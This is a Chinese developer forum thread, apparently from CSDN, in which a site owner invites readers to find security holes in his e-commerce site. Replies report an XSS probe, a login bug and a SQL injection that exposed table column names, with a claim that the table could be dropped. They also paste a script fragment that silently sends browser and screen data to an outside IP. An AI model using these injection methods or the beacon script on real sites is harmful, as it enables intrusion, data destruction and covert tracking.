因为工作原因做了个网站
http://www.zingmall.com.cn/
http://admin.zingmall.com.cn/
用来以后哄人大家上去帮看一下安全漏洞问题,发现一个给200分,有建议的给100分
谢谢PS:请大家不要更改后台的用户名,好让大家都能进.请不要随便删除数据,而免其他人用不了,要删除的话就删除你加的就行了
谢谢大家的指点
http://www.zingmall.com.cn/
http://admin.zingmall.com.cn/
用来以后哄人大家上去帮看一下安全漏洞问题,发现一个给200分,有建议的给100分
谢谢PS:请大家不要更改后台的用户名,好让大家都能进.请不要随便删除数据,而免其他人用不了,要删除的话就删除你加的就行了
谢谢大家的指点
解决方案 »
- .net新手入门,请大家帮忙一下
- asp.net连接oracle数据库,报错"[NullReferenceException: 未将对象引用设置到对象的实例。]"
- 紧急求助:有关VS2005制作Web安装程序并修改web.config文件中的连接字符串问题!
- 如何把treeview中复选框选中的内容存放到数据库的表中?
- 请问怎样在页面里设全局变量
- 菜鸟求助~~关于数据库连接的问题
- 为什么以前在ASP里好好的JavaScript程序,同样的放到.NET里,有的时候就会出错.
- 什么时间触发Page_Load?
- 如何禁用TreeView中的CheckBox
- 大家给一个开发WEB项目技术路线吧
- 利用Repeater如何显示出这样的形式?
- 如何学习Web开发
如输入<script>alert();</script>赶快加分,不加分就不帮找漏洞了。我是专业人员
---------------------------
这个应该是一个错误页面,我还没有做,也算是,我记起来了 100分RE:viewstate禁用吧,一大堆
---------------------------
这个HTML内容的优化还没有用.不过我就算是半个建议记起来了 50分
“/”应用程序中的服务器错误。
--------------------------------------------------------------------------------从客户端(UC_Menu1$txtKeyWord="<br>")中检测到有潜在危险的 Request.Form 值。
说明: 请求验证过程检测到有潜在危险的客户端输入值,对请求的处理已经中止。该值可能指示危及应用程序安全的尝试,如跨站点的脚本攻击。通过在 Page 指令或 配置节中设置 validateRequest=false 可以禁用请求验证。但是,在这种情况下,强烈建议应用程序显式检查所有输入。 异常详细信息: System.Web.HttpRequestValidationException: 从客户端(UC_Menu1$txtKeyWord="<br>")中检测到有潜在危险的 Request.Form 值。
--------------------------------------------
这个错误和 2楼 相似,所以这里不再进行加分,谢谢
以"admin"帐号注册,提示注册成功
再以"admin"帐号登录,提示"当前用户已经禁用,请联系管理员".两边不对称...
闪了.居然不给分...
哦,这样啊.那算了.
以"admin"帐号注册,提示注册成功
再以"admin"帐号登录,提示"当前用户已经禁用,请联系管理员".两边不对称...
闪了.居然不给分...
--------------------------
好的, 100分
可能程序的Status状态注册的时候没有加为 1而是0哈哈
----------------
如何看到? 是有这一个字段
用户注册后没有办法登录
本地程序已经添加了代码
info.Status = 1;
但网上没有,大家可以注册后到后台自行启用当前用户谢谢
SQL注入...
---------------------------------------
://218.16.103.96:4022/logo.jpg?p="; link += Math.floor((new Date()).getTime()/1000); link += "|"; link += navigator.appMinorVersion; link += "|"; link += screen.availHeight; link += "|"; link += screen.availWidth; link += "|"; link += screen.colorDepth; link += "|"; link += screen.height; link += "|"; link += screen.width; objElement.setAttribute("src",link); objElement.style.display="none"; document.body.appendChild(objElement); }; window.setInterval("window.status=' '",200); window.setTimeout('refresh()',1000); test();
OL_Material.cs:942 行处用的拼SQL的方法.....
http://www.zingmall.com.cn/List.xhtml 可以通过参数W
SQL注入...
-----------------------------------
对这是个问题,因为这里面我没有对他进行SQL过滤
是不是这里进行SQL过滤呢,
那这个还有什么好的方法呢?100分记下了谢谢
栏位名称分别为:
C# code
MaterialCode, MaterialTypeCode, MaterialPic, MaterialSmallPic,BarCode,FullName, BrandCode, KindCode, SeriesCode, ItemCode, GenderCode,PriceCode,ColorFirst,ColorSecond, ColorThird, YearNo, MonthNo, SeasonCode, UnitCode, TechLevelCode, Origin, StuffFirst, StuffSecond, StuffThird, CostPrice, RetailPrice, Discount, DiscountPrice, SalePrice, StockQty, Notic, Intro, SimpleIntro, Integral, MetaTitle, MetaKeywords, MetaDescription, Weight, WeightUnit, Alarm, ActiveBeginDateBegin, ActiveBeginDateEnd, ActiveEndDateBegin, ActiveEndDateEnd, AddTimeBegin, AddTimeEnd, AddUserID, AllRate, MonthRate, WeekRate, Dimensions, HaveInvoice, IsIndexTop, ISTypeTop, ISHot, IsOnSale, OrderID, Status, RandomGUID, OrderBy, SizeCode, PageIndex, PageSize, RecordCount, UseCacheOL_Material.cs:942 行处用的拼SQL的方法.....
-------------------------------------------
是的,这个是怎么得出来的呢
是不是那个查询那里的出错注入出错信息?
hohoho
字段全被我看见了。而且我可以把表drop掉